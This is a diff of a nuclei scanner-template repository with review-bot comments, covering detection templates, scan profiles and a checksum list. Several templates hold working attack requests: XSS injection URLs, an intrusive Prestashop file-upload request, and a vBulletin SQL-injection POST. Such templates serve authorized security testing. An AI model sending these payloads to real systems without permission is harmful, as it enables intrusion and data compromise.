remediation: Disable the rocket loader or Add a CSP header to fix this issue.
|
||||
|
@ -39,4 +39,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 490a004630440220078dae8c97372b931bd7435693b67c204a81c9411fcbe20e1fc657d63704bdff02200cc52e3711d11352ce0f241c9cc79a6371d05c0070ec19166837dfcea4382ead:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502204d31387c924b19c1fe6ea3ac22a8c991cac1bee85fff7482d398b5817711313b022100f6125416aaf2f9132f5aac7ac183e6f855f343124e33e429d10bb07af5553fdb:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,33 @@
|
|||
id: eyoucms-installer
|
||||
|
||||
info:
|
||||
name: EyouCMS - Installation
|
||||
author: ritikchaddha
|
||||
severity: high
|
||||
description: EyouCMS installation is exposed.
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
fofa-query: title="eyoucms"
|
||||
tags: misconfig,eyoucms,install
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/install/index.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "EyouCms"
|
||||
- "/install/index.php?step=2"
|
||||
- "使用协议</p>"
|
||||
condition: and
|
||||
case-insensitive: true
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022005864c291f566f94cb1cc5267ab73f7b7b0d2b18a6f1c698c2a27afc1dbace6b02210096de625a1792dfa0a8ef36f8cf036acd78968f54f7726da711d3a777b31fe1a5:922c64590222798bb761d5b6d8e72950
|
|
@ -31,6 +31,7 @@ http:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- contains(tolower(header), 'x-guploader-uploadid')
|
||||
- contains(tolower(header), "aliyunoss")
|
||||
negative: true
|
||||
|
||||
- type: word
|
||||
|
@ -77,4 +78,4 @@ http:
|
|||
regex:
|
||||
- '<li>BucketName: (.*?)</li>'
|
||||
- '<BucketName>(.*?)</BucketName>'
|
||||
# digest: 4a0a00473045022052c03d64bf92ed3e2156360f7da406ef950a4292a8d29b08de54d645483122e1022100a8172443bfd3c3b235f40e2963f3f37d538106e9004629cd1393c789bfb7983c:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100a1bf43094a8a2ebf252d9ff331d334da4732cc4973121200c8d1a1faad8c0d0002201952b9324faa832fbed0e7662d820c1e56ea3f0820a3a67bc11da01926bba9b0:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,36 @@
|
|||
id: squadcast-takeover
|
||||
|
||||
info:
|
||||
name: Squadcast Takeover Detection
|
||||
author: philippedelteil
|
||||
severity: high
|
||||
reference:
|
||||
- https://github.com/EdOverflow/can-i-take-over-xyz/issues/398
|
||||
metadata:
|
||||
max-request: 1
|
||||
tags: takeover,squadcast
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- Host != ip
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'There doesn’t seem to be an active status page associated with this URL.'
|
||||
- 'Please check the URL and try again.'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 404
|
||||
# digest: 4a0a00473045022073e3651947c403258a6376ad586534893f46abfcd2d9728c1d0edbeab2ff2be4022100f20a52cd2ab0ea4a4ebeabc28511e0ccb3aaaebffaac719e499d3662b7a127e7:922c64590222798bb761d5b6d8e72950
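Review bot: The `info` block has no `description`, so a finding carries only the name and the issue link; a line such as `description: Squadcast takeover was detected.` would match the neighbouring surge template. The first entry of the word matcher contains a typographic apostrophe (`doesn’t`), which matches only if the response body is decoded with the same encoding. The second phrase, `Please check the URL and try again.`, is generic on its own, so the `condition: and` on that matcher should stay.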
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: high
|
||||
description: surge takeover was detected.
|
||||
reference:
|
||||
- https://github.com/EdOverflow/can-i-take-over-xyz
|
||||
- https://github.com/EdOverflow/can-i-take-over-xyz/issues/198
|
||||
metadata:
|
||||
max-request: 1
|
||||
tags: takeover
|
||||
|
@ -25,4 +25,8 @@ http:
|
|||
- type: word
|
||||
words:
|
||||
- project not found
|
||||
# digest: 490a00463044022064c4ab13768f1a4fa885670b9020a4c8ac4cc28f650d65e7b146c52d1ccbd6fe02201650ae50cfbcbbf6790afdd7de6a939cb12ca3348c31167ade8a032969493f04:922c64590222798bb761d5b6d8e72950
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 404
|
||||
# digest: 4a0a004730450221008687ea9c91087816fda6cde6f2654de22d64f00f4452d3c150919a3d02c09d80022010aceb815c267cd65a6a2d4a9e2632b00ab2724596e2edaa4f816b872406f809:922c64590222798bb761d5b6d8e72950
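Review bot: The `status: 404` matcher narrows the result only if the request block sets `matchers-condition: and`, which sits above this hunk and is not visible here. Under the default `or` condition it would fire on any 404 response, so this is worth confirming before merge. The word matcher `project not found` is a fairly generic phrase, which is presumably why the status check is being added. The `matchers` list starts outside the hunk.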
|
|
@ -1,12 +1,12 @@
|
|||
id: unauthenticated-jenkins
|
||||
|
||||
info:
|
||||
name: Unauthenticated Jenkins Dashboard
|
||||
name: Jenkins Dashboard - Unauthenticated Access
|
||||
author: dhiyaneshDK
|
||||
severity: high
|
||||
description: Jenkins Dashboard is exposed to external users.
|
||||
metadata:
|
||||
max-request: 1
|
||||
max-request: 2
|
||||
tags: jenkins
|
||||
|
||||
http:
|
||||
|
@ -21,9 +21,8 @@ http:
|
|||
- type: word
|
||||
words:
|
||||
- Dashboard [Jenkins]
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100cef11be2e4fc4d5fe925f91269917b5763805635e48d3ae6c5ead57dbe56d9e0022100e2b91fe6026d44a02b15e34655c58d3a95cb070db314386bbb568a1f1b05ace3:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402202b26e420567b42984cf73e1432a2d97a046c3a65adce12505d6c7f15b8117a3702207727a946b018ec8d53a5d62b3cb34129cdd87d1d85d2fac1efa37332668197eb:922c64590222798bb761d5b6d8e72950
|
|
@ -1,45 +0,0 @@
|
|||
id: academy-lms-xss
|
||||
|
||||
info:
|
||||
name: Academy Learning Management System 5.11 - Cross-Site Scripting
|
||||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
Academy Learning Management System 5.11 contains a cross-site scripting vulnerability via the Search parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/170514/Academy-LMS-5.11-Cross-Site-Scripting.html
|
||||
- https://vulners.com/packetstorm/PACKETSTORM:170514
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cwe-id: CWE-80
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: http.html:"Academy LMS"
|
||||
tags: packetstorm,lms,academy,xss
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<script>alert(document.domain)</script>'
|
||||
- 'Academy LMS'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4b0a004830460221009e530a17ae78eac3aa6f5f7068e7bf08f565124913897a0d1dd64d31f40788d2022100b28dd0a800a903ce5787b586745bf33830e97dec0adc8a91858774a5ba5218c9:922c64590222798bb761d5b6d8e72950
|
|
@ -17,7 +17,7 @@ info:
|
|||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}preview.php?controller=Load&action=index&catid=moztj%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Ems3ea&down_up=a"
|
||||
- "{{BaseURL}}/preview.php?controller=Load&action=index&catid=moztj%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Ems3ea&down_up=a"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
|
@ -26,5 +26,4 @@ http:
|
|||
- 'contains(body, "><script>alert(document.domain)</script>") && contains(body, "New Topic")'
|
||||
- 'contains(content_type, "text/html")'
|
||||
condition: and
|
||||
|
||||
# digest: 4a0a004730450221009c6ff6f5b059c822eaf5fc7399b0fcfc8b4b8ab99bdf3d5541bcbac5591ccaca022066329ee7e27e760f069414e1cd4d583f8bb56bfa9981f1a24fd31f24421711a9:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100a8c54695560c315e38751b221c77539e1614299bcaad0046383880c77e8fca0b022036a2cf634429cbab82c74c9633e30a0d31b3acb8babf044601ef51816fdbf453:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,49 @@
|
|||
id: prestashop-cartabandonmentpro-file-upload
|
||||
|
||||
info:
|
||||
name: Prestashop Cart Abandonment Pro File Upload
|
||||
author: MaStErChO
|
||||
severity: critical
|
||||
reference:
|
||||
- https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/
|
||||
- https://dh42.com/blog/prestashop-security/
|
||||
metadata:
|
||||
framework: prestashop
|
||||
shodan-query: http.component:"prestashop"
|
||||
verified: true
|
||||
max-request: 1
|
||||
tags: intrusive,file-upload,cartabandonmentpro,prestashop
|
||||
|
||||
variables:
|
||||
filename: '{{rand_base(7, "abc")}}'
|
||||
title: '{{rand_base(7, "abc")}}'
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /modules/cartabandonmentpro/upload.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=xYzZY
|
||||
|
||||
--xYzZY
|
||||
Content-Disposition: form-data; name="image"; filename="{{filename}}.php.png"
|
||||
Content-Type: image/png
|
||||
|
||||
<html>
|
||||
<!-- {{title}} -->
|
||||
</html>
|
||||
|
||||
--xYzZY--
|
||||
|
||||
- |
|
||||
GET /modules/cartabandonmentpro/uploads/{{filename}}.php.png HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(header_2, "image/png")'
|
||||
- 'contains(body_1, "{{filename}}.php.png")'
|
||||
- 'status_code_1 == 200 && status_code_2 == 200'
|
||||
condition: and
|
||||
# digest: 4b0a00483046022100de92782af5f1630bc6e15e5f559a18b2d829e22e0cea3452c013a54974c9c84f0221009371017eb7a14acd8fc29c5975ef5cd9f0b8f73582066b39db1294758b231b6a:922c64590222798bb761d5b6d8e72950
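Review bot: `max-request: 1` does not match the two raw requests this template sends; it should read `max-request: 2`. The `title` variable is written into the uploaded body but never checked, so the matchers prove only that a PNG-typed 200 response exists at the path. Adding `- 'contains(body_2, "{{title}}")'` would tie the second response to this run's upload and reduce false positives. The `info` block has no `description`; since the template is tagged `intrusive` and sends no request that removes the uploaded file, a sentence saying so would help operators decide where it may be run.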
|
|
@ -14,7 +14,7 @@ info:
|
|||
verified: true
|
||||
max-request: 1
|
||||
fofa-query: title="TitanNit Web Control"
|
||||
tags: titanit,web-control,ssrf,oast,rce
|
||||
tags: titanit,web-control,oast,rce
|
||||
|
||||
http:
|
||||
- raw:
|
||||
|
@ -34,4 +34,4 @@ http:
|
|||
part: body
|
||||
words:
|
||||
- "titan.css"
|
||||
# digest: 4b0a00483046022100879d069429630f609a358e6d75ca42bc2a252e693eacd5871e1fd985f8c45a9d022100a9e019ea6c7dbc14a86cca85d5e089e3a2ef69454aedbbd719d6e15f9a5321dc:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502204924c878a5a761c1445ca81b66143ef9dc59bee364ee1c721712f16e3c4fc6d80221008fa2593dc7557f42af384a29e3b87cab735bd2cb14cc635787fe6809aef33640:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,42 @@
|
|||
id: vbulletin-search-sqli
|
||||
|
||||
info:
|
||||
name: vBulletin `Search.php` - SQL Injection
|
||||
author: MaStErChO
|
||||
severity: high
|
||||
description: |
|
||||
vBulletin 4 is vulnerable to an SQL injection vulnerability, which may allow an attacker can execute malicious SQL statements that control a web application's database server.
|
||||
remediation: Upgrade to the latest version of vBulletin.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/17314
|
||||
- https://web.archive.org/web/20181129123620/https://j0hnx3r.org/vbulletin-4-x-sql-injection-vulnerability/
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: http.component:"vBulletin"
|
||||
tags: vbulletin,sqli
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /search.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
contenttypeid=7&do=process&humanverify=1&cat[]=-1%27
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "type=dberror"
|
||||
- "MySQL Error"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 503
|
||||
condition: or
|
||||
# digest: 4b0a0048304602210084dd0d783afb78cfa19cc10f84030918f06fe86708e84bc6d5bfdf4ced8fe10c02210094a54b19eb0bb0c4c16160977a3be435769921093900186566c64fa372caafdb:922c64590222798bb761d5b6d8e72950
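Review bot: The `description` is ungrammatical ("may allow an attacker can execute") and does not name the affected endpoint. Something like `vBulletin 4 is vulnerable to SQL injection in search.php, which may allow an attacker to execute SQL statements against the application's database.` reads cleanly. `remediation: Upgrade to the latest version of vBulletin.` is generic; if the listed references give a fixed release, name it. The `condition: or` under the status matcher appears redundant, since a status list already matches any listed code.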
|
|
@ -2,8 +2,8 @@ id: wordpress-accessible-wpconfig
|
|||
|
||||
info:
|
||||
name: WordPress wp-config Detection
|
||||
author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n,tess,0xpugazh,mastercho
|
||||
severity: medium
|
||||
author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n,tess,0xpugazh,mastercho,c4sper0
|
||||
severity: high
|
||||
description: WordPress `wp-config` was discovered. This file is remotely accessible and its content available for reading.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
|
@ -49,6 +49,8 @@ http:
|
|||
- "/config.php.new"
|
||||
- "/common/config.php.new"
|
||||
- "/wp-config.php.bk"
|
||||
- "/home/{{DN}}WORDPRESS.txt"
|
||||
- "/home/{{DN}}-WORDPRESS.txt"
|
||||
|
||||
stop-at-first-match: true
|
||||
|
||||
|
@ -74,4 +76,4 @@ http:
|
|||
- "DB_USERNAME"
|
||||
- "DB_PASSWORD"
|
||||
condition: and
|
||||
# digest: 4b0a00483046022100e3482e35fafed169b3577d8894756ef07374b332c632601accbb8813b1ff2766022100f03dab57c516384fc14dc867db33cdb8d637b0fe33cf505de63f01c69c67b8f0:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100a15bddebdd77d968c7c0fcca60c08f9a364a6d3a3f984df3fe3b704976a69a07022100eea8defecc4f10f2257350fca0e63dbaff1c8c4b7f93262a5b8e553b23adfef4:922c64590222798bb761d5b6d8e72950
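Review bot: If `severity: high` is the new value, it disagrees with the `cvss-metrics` vector kept as context in the first hunk, `CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N`, whose only impact is low confidentiality. The matchers at the end of the file look for `DB_USERNAME` and `DB_PASSWORD`, so a high rating is defensible. In that case the vector should be raised to match (for example `C:H`), along with any `cvss-score` line, which is outside the hunk. Otherwise tools that sort on the classification and tools that filter on `severity` will rank the same finding differently.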
|
|
@ -1,26 +1,13 @@
|
|||
# This is a configuration file for the bugbounty template profile.
|
||||
# This is a configuration file for the all template profile.
|
||||
# Additional configuration profiles can be created for different types of nuclei scans.
|
||||
# They should be placed under the 'config' directory at:
|
||||
# https://github.com/projectdiscovery/nuclei-templates
|
||||
# Here is an example of how to use a config profile:
|
||||
# nuclei -config config/bugbounty.yml -list target_list_to_scan.txt
|
||||
|
||||
severity:
|
||||
- critical
|
||||
- high
|
||||
- medium
|
||||
- low
|
||||
- unknown
|
||||
|
||||
# nuclei -config config/osint.yml -list target_list_to_scan.txt
|
||||
type:
|
||||
- http
|
||||
- tcp
|
||||
- javascript
|
||||
- dns
|
||||
- ssl
|
||||
|
||||
exclude-tags:
|
||||
- tech
|
||||
- dos
|
||||
- fuzz
|
||||
- creds-stuffing
|
||||
- token-spray
|
||||
- osint
|
|
@ -0,0 +1,12 @@
|
|||
# This is a configuration file for the cves template profile.
|
||||
# Additional configuration profiles can be created for different types of nuclei scans.
|
||||
# They should be placed under the 'config' directory at:
|
||||
# https://github.com/projectdiscovery/nuclei-templates
|
||||
# Here is an example of how to use a config profile:
|
||||
# nuclei -config config/osint.yml -list target_list_to_scan.txt
|
||||
|
||||
templates:
|
||||
- http/cves/
|
||||
- http/cnvd/
|
||||
- network/cves/
|
||||
- javascript/cves/
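Review bot: The usage example in the header comment names the wrong file: `# nuclei -config config/osint.yml -list target_list_to_scan.txt` appears to be copied from the osint profile. A user who follows it runs a different profile from the one this header describes, so the line should reference this profile's own file name under `config/`. The same example line appears in the default logins, misconfigurations and subdomain takeover profiles added below, and in the modified profile in the preceding section.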
|
|
@ -0,0 +1,11 @@
|
|||
# This is a configuration file for the default logins template profile.
|
||||
# Additional configuration profiles can be created for different types of nuclei scans.
|
||||
# They should be placed under the 'config' directory at:
|
||||
# https://github.com/projectdiscovery/nuclei-templates
|
||||
# Here is an example of how to use a config profile:
|
||||
# nuclei -config config/osint.yml -list target_list_to_scan.txt
|
||||
|
||||
templates:
|
||||
- http/default-logins/
|
||||
- network/default-login/
|
||||
- javascript/default-logins/
|
|
@ -1,4 +1,4 @@
|
|||
# This is a configuration file for the KEV template profile.
|
||||
# This is a configuration file for the CISA KEV template profile.
|
||||
# Additional configuration profiles can be created for different types of nuclei scans.
|
||||
# They should be placed under the 'config' directory at:
|
||||
# https://github.com/projectdiscovery/nuclei-templates
|
||||
|
|
|
@ -0,0 +1,11 @@
|
|||
# This is a configuration file for the misconfigurations template profile.
|
||||
# Additional configuration profiles can be created for different types of nuclei scans.
|
||||
# They should be placed under the 'config' directory at:
|
||||
# https://github.com/projectdiscovery/nuclei-templates
|
||||
# Here is an example of how to use a config profile:
|
||||
# nuclei -config config/osint.yml -list target_list_to_scan.txt
|
||||
|
||||
templates:
|
||||
- http/misconfiguration/
|
||||
- network/misconfig/
|
||||
- javascript/misconfiguration/
|
|
@ -0,0 +1,11 @@
|
|||
# This is a configuration file for the subdomain takeover template profile.
|
||||
# Additional configuration profiles can be created for different types of nuclei scans.
|
||||
# They should be placed under the 'config' directory at:
|
||||
# https://github.com/projectdiscovery/nuclei-templates
|
||||
# Here is an example of how to use a config profile:
|
||||
# nuclei -config config/osint.yml -list target_list_to_scan.txt
|
||||
|
||||
templates:
|
||||
- http/takeovers/
|
||||
- dns/azure-takeover-detection.yaml
|
||||
- dns/elasticbeanstalk-takeover.yaml
|
|
@ -88,14 +88,14 @@ cloud/aws/s3/s3-public-write-acp.yaml:3f2b36613d8008e1ac419f86a3986b6805958a39
|
|||
cloud/aws/s3/s3-public-write.yaml:f437b7481168279f14d743f6fcec2b07388e894e
|
||||
cloud/aws/s3/s3-server-side-encryption.yaml:5ad53f21b9bd0f6429456de397a4ecf6b45f5e24
|
||||
cloud/aws/s3/s3-versioning.yaml:bc4dadf7b83430d4f1d666bc0d61fff82bd0af1a
|
||||
cloud/aws/vpc/nacl-open-inbound.yaml:c37fc3d3cf8f958463cc9866508ae592b443f45f
|
||||
cloud/aws/vpc/nacl-outbound-restrict.yaml:2bf48e55f84c699328d7b6fa817ddaeeb2dd0bd1
|
||||
cloud/aws/vpc/nat-gateway-usage.yaml:1be291e02105543d5dd3e21ab16ad934f0378fdc
|
||||
cloud/aws/vpc/unrestricted-admin-ports.yaml:9ff885af43ee0f899f553eca7ede2dad946d9b7e
|
||||
cloud/aws/vpc/vpc-endpoint-exposed.yaml:b92e7486a3d12b8e7852462749cb2367100d9bf1
|
||||
cloud/aws/vpc/vpc-endpoints-not-deployed.yaml:b9a8f1c8578f6fa44a539f3f728f7166a71923b3
|
||||
cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml:9e579ae244c162e6fa5b27348290079e1c9a5008
|
||||
cloud/aws/vpc/vpn-tunnel-down.yaml:5151f54f14688d396709d5c2d16c3c7b087e2d4b
|
||||
cloud/aws/vpc/nacl-open-inbound.yaml:4117d3d0d468f9b723f63cd36a964cd73f82e76f
|
||||
cloud/aws/vpc/nacl-outbound-restrict.yaml:dccc34edf2429e53bef902b6979e52418b415c14
|
||||
cloud/aws/vpc/nat-gateway-usage.yaml:c292fbd2ca07a84b1c10d83cce119c2a024fb800
|
||||
cloud/aws/vpc/unrestricted-admin-ports.yaml:3364c4aaa26cd2252bab903ac561fd8eb2fd2314
|
||||
cloud/aws/vpc/vpc-endpoint-exposed.yaml:b5517ee9213554b46ac6ed3064f8e78adbab0108
|
||||
cloud/aws/vpc/vpc-endpoints-not-deployed.yaml:1ddc0bac11e1c8827ae10389e8fb35444f8a0a82
|
||||
cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml:962bdc88135be9ba9328fd7fd9ad52d26c1fed6b
|
||||
cloud/aws/vpc/vpn-tunnel-down.yaml:427ec306b6366a932a6a2c0c0d6f45b8ebf850de
|
||||
cloud/enum/aws-app-enum.yaml:61abc31cc0ae208df9ed070e7d238edde3e82f48
|
||||
cloud/enum/aws-s3-bucket-enum.yaml:0d101b898bbaebceea4020963d11829f8167029f
|
||||
cloud/enum/azure-db-enum.yaml:1a84da310edfa148667be811a8f749b93a263d0a
|
||||
|
@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd
|
|||
code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17
|
||||
code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9
|
||||
contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159
|
||||
cves.json:093496181a54e1ca8a72dc3e80f1a16d953eba11
|
||||
cves.json-checksum.txt:82d1c1b8bbfab0b5f72989fb3c58fe16109c7de3
|
||||
cves.json:0820bc134ca52d7071cc8c6596b3ac37a095a0ae
|
||||
cves.json-checksum.txt:996eafaef74b06977788950a04aeebf48b096611
|
||||
dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22
|
||||
dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396
|
||||
dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e
|
||||
|
@ -451,7 +451,7 @@ file/malware/bozok-malware.yaml:b997aa419b2d0ce9c6edf79c9031e4e943fd79a7
|
|||
file/malware/bublik-malware.yaml:1ca6a30e1865b979a297ee0f5c92878ba68b57bb
|
||||
file/malware/cap-hookexkeylogger-malware.yaml:6622fc9690427fb8d818e84d47bd268f49253261
|
||||
file/malware/cerber-malware.yaml:8d600a1106a51bcd2709c8156127741cfbb5d0f5
|
||||
file/malware/cerberus-malware.yaml:38966c3659344648f0dcf0eab98da65e0024bfe5
|
||||
file/malware/cerberus-malware.yaml:74b8c9a01b459e4eb65c460d32d7d149bfe54334
|
||||
file/malware/clientmesh-malware.yaml:3450451cee310b336b87f7380015172d8c8b1e90
|
||||
file/malware/crimson-malware.yaml:a882939cc1854f5853ab7b79bb7e263302507316
|
||||
file/malware/crunchrat-malware.yaml:9700327529d967b11598c0d9550db4d5fb3ecf91
|
||||
|
@ -855,7 +855,7 @@ http/cnvd/2020/CNVD-2020-63964.yaml:e340531566025fec2a69c5b211366d34aabebdbf
|
|||
http/cnvd/2020/CNVD-2020-67113.yaml:b6ed5ca5c479927c2d267a6beb708bdc782c1b8a
|
||||
http/cnvd/2020/CNVD-2020-68596.yaml:4a1c644954b7d789b503a390644acfc1c459e1dc
|
||||
http/cnvd/2021/CNVD-2021-01931.yaml:16f6c167f58030d3042772280faea486e8e19a7d
|
||||
http/cnvd/2021/CNVD-2021-09650.yaml:cd2f4b8a579018a3035fc7ec94d1802ff6e1a276
|
||||
http/cnvd/2021/CNVD-2021-09650.yaml:c52190bcf210a731366792c944c5bfe8272296a8
|
||||
http/cnvd/2021/CNVD-2021-10543.yaml:c1026547067fb7f3dd5601f3f71eec8793222778
|
||||
http/cnvd/2021/CNVD-2021-14536.yaml:78b9c1a700aedb16c09fb174f3a2b87361e4d757
|
||||
http/cnvd/2021/CNVD-2021-15822.yaml:2d07bfd7e2578a3cb23bf8d3efb74adf85abd035
|
||||
|
@ -1183,6 +1183,7 @@ http/cves/2015/CVE-2015-4063.yaml:82f243448aa7204d9d610679fb10f817dbb54750
|
|||
http/cves/2015/CVE-2015-4074.yaml:065fb740afd3068b6d1e46df88070d26b6ce45e0
|
||||
http/cves/2015/CVE-2015-4127.yaml:544be4829bf72ee7d73cc4cb7f47f3fd3f1ae01c
|
||||
http/cves/2015/CVE-2015-4414.yaml:d62aaf0ccbf4332dd956ee3fa625dfef380e07cd
|
||||
http/cves/2015/CVE-2015-4455.yaml:c9428c8c8a30af5dfb87b2b89927f3ce1ba7b554
|
||||
http/cves/2015/CVE-2015-4632.yaml:d062862654959446af1cb7bdb1e5ff2ff029510e
|
||||
http/cves/2015/CVE-2015-4666.yaml:846d0baaf39e9f004c072d698ff122871460f68e
|
||||
http/cves/2015/CVE-2015-4668.yaml:2b4888f257c6dc0cba9ee277c343475ea06da19f
|
||||
|
@ -1667,6 +1668,7 @@ http/cves/2019/CVE-2019-6340.yaml:c0e85bf4c7d5a44b6a2288baf33daa21966dc5c3
|
|||
http/cves/2019/CVE-2019-6715.yaml:3e335ffc1bb0e3d32a7755cbeb02535407298af7
|
||||
http/cves/2019/CVE-2019-6799.yaml:86e0107a33657c4a446eae5ee6544633801be073
|
||||
http/cves/2019/CVE-2019-6802.yaml:04678947a8f58198df25d0b489029618cca2caff
|
||||
http/cves/2019/CVE-2019-7139.yaml:9ce4e6a9da54dabf3d98d063111cc7e8d337fef7
|
||||
http/cves/2019/CVE-2019-7192.yaml:40ab1445f19dcd09322617d418a9612eea02bac9
|
||||
http/cves/2019/CVE-2019-7219.yaml:6372986a8f04b8ace9c02f4973e0ee15ee51e08a
|
||||
http/cves/2019/CVE-2019-7238.yaml:78115715b771474b691df0757ad350bd6dac77ca
|
||||
|
@ -2821,7 +2823,7 @@ http/cves/2022/CVE-2022-4320.yaml:85df1be119e20f7dd54ec90fe4f29813ec89fc90
|
|||
http/cves/2022/CVE-2022-4321.yaml:18451ef7ed2083de058c2fc773cd4c0df5a2b383
|
||||
http/cves/2022/CVE-2022-4325.yaml:f186020c216cd067428f78142dc9637ac51c3ec8
|
||||
http/cves/2022/CVE-2022-4328.yaml:027d49a96bd49b38b06c63fe56e85df269c0af27
|
||||
http/cves/2022/CVE-2022-43769.yaml:c6a4115aa490d6bea5d94d4fd5313fafebf2ba56
|
||||
http/cves/2022/CVE-2022-43769.yaml:c486a19621f831f2ff911d73ccaabea6d3cd160c
|
||||
http/cves/2022/CVE-2022-44290.yaml:c603b4cdf73c9b70df220546fb645d454fbfd368
|
||||
http/cves/2022/CVE-2022-44291.yaml:50e4b9fef3f63a6f1166f23761c05ecea1412bbb
|
||||
http/cves/2022/CVE-2022-4447.yaml:c9d25f4aa9bb183e694aeaf192aef082aaa8488d
|
||||
|
@ -2953,7 +2955,7 @@ http/cves/2023/CVE-2023-24733.yaml:8c12c7187efcc4652bb7bf6bb0069cbe8762fc0d
|
|||
http/cves/2023/CVE-2023-24735.yaml:35b457aeb699de6d59519aff249be662b70d4a37
|
||||
http/cves/2023/CVE-2023-24737.yaml:facc801d9eca13c7392c35caa520fb642f0c5971
|
||||
http/cves/2023/CVE-2023-2479.yaml:e380c2326f30db012e6a091a9a20bd2c9c56b0cd
|
||||
http/cves/2023/CVE-2023-25135.yaml:123ab210e4561811b02eecec4b99eb2402772773
|
||||
http/cves/2023/CVE-2023-25135.yaml:8a3b6d23aac32527511e347c7212b8f8a227117b
|
||||
http/cves/2023/CVE-2023-25157.yaml:a47b8df2e4f9871518e24d36431cc36466e35e36
|
||||
http/cves/2023/CVE-2023-25194.yaml:754c9c257413b4590237bd3a90e17393dace3436
|
||||
http/cves/2023/CVE-2023-25346.yaml:fca6cb7b61b9f36d5aaed4cc545a276e354c490d
|
||||
|
@ -2970,6 +2972,7 @@ http/cves/2023/CVE-2023-2648.yaml:41ec7f7a05226cc4b5805c7b3018d5d492f21343
|
|||
http/cves/2023/CVE-2023-26842.yaml:a8e888fe71856500458f993a7623c95a5acf2d34
|
||||
http/cves/2023/CVE-2023-26843.yaml:a29e22aabb4f3c623854b0e2f79c6aaba42bd323
|
||||
http/cves/2023/CVE-2023-27008.yaml:99b72f80285fcea1ca809221940b6dd32a511432
